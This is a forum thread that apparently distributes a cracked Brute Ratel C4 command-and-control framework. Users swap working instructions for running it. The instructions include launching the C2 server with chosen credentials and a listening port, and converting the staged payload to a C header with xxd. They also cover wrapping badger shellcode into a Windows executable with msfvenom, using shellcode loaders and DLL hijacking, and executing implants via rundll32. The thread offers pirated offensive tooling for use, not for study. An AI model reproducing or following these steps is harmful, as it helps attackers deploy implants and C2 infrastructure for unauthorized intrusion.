Cracked Brute Ratel C4 [Cracked][MEGA]
by - Thursday, January 1, 1970 at 12:00 AM
issue is the cracked version only supporting stage-less badger with shell code option also  no non-service executable build option ( which i good help so many skids wont use it for them hard to make a simple shell code loader )

also instead of venom shell code loader u can also use another shell code loader or use dll build for dll hijacking method

Reply
(September 23, 2022, 04:42 PM)mrx325 Wrote: issue is the cracked version only supporting stage-less badger with shell code option also  no non-service executable build option ( which i good help so many skids wont use it for them hard to make a simple shell code loader )

also instead of venom shell code loader u can also use another shell code loader or use dll build for dll hijacking method


Did you try to enable stage on your listener ?
Reply
you need to enable stage on listener and know how to compile the stage because it may crash.
Reply
(September 24, 2022, 12:16 PM)crazygama Wrote: you need to enable stage on listener and know how to compile the stage because it may crash.


exactly,
you can xxd -i stage.bin > shellcode.h

then use profile in adhoc script folder to run the shellcode
Reply
thanks for sharing this
Reply
(September 22, 2022, 12:19 PM)msec Wrote:
(September 22, 2022, 01:14 AM)0dayzay Wrote:
(September 21, 2022, 03:35 PM)bcamelo Wrote: can you share exact commands to start/run c2 server?  apparently i got a PAGE NOT FOUND when access webpage...


You have to run the commander to build a stub that connects back to the server.


It appear to have problems with payload generation.
all payloads are stagless, just tried badger via rundll32 it works.

You can try msfvenom to feed the shellcode from stdin

cat badger.bin | msfvenom -p - -f exe --platform win -a x64 -o badger.exe


(September 21, 2022, 03:35 PM)bcamelo Wrote: can you share exact commands to start/run c2 server?  apparently i got a PAGE NOT FOUND when access webpage...


./brute-ratel-linx64 -ratel -a admin -p admin@123 -h 0.0.0.0:1337 -sc cert.pem -sk key.pem
./commander-runme


what are the credentials of c2 host,username and password
Reply
(September 27, 2022, 08:27 PM)Nina Wrote:
(September 22, 2022, 12:19 PM)msec Wrote:
(September 22, 2022, 01:14 AM)0dayzay Wrote:
(September 21, 2022, 03:35 PM)bcamelo Wrote: can you share exact commands to start/run c2 server?  apparently i got a PAGE NOT FOUND when access webpage...


You have to run the commander to build a stub that connects back to the server.


It appear to have problems with payload generation.
all payloads are stagless, just tried badger via rundll32 it works.

You can try msfvenom to feed the shellcode from stdin

cat badger.bin | msfvenom -p - -f exe --platform win -a x64 -o badger.exe


(September 21, 2022, 03:35 PM)bcamelo Wrote: can you share exact commands to start/run c2 server?  apparently i got a PAGE NOT FOUND when access webpage...


./brute-ratel-linx64 -ratel -a admin -p admin@123 -h 0.0.0.0:1337 -sc cert.pem -sk key.pem
./commander-runme


what are the credentials of c2 host,username and password

You define them with -a and -p options.
Reply
Thanks  man! I was looking for this too long!
Reply
thanks for sharing bruteratel
Reply
thanks for sharing
Reply


 Users viewing this thread: Cracked Brute Ratel C4 [Cracked][MEGA]: No users currently viewing.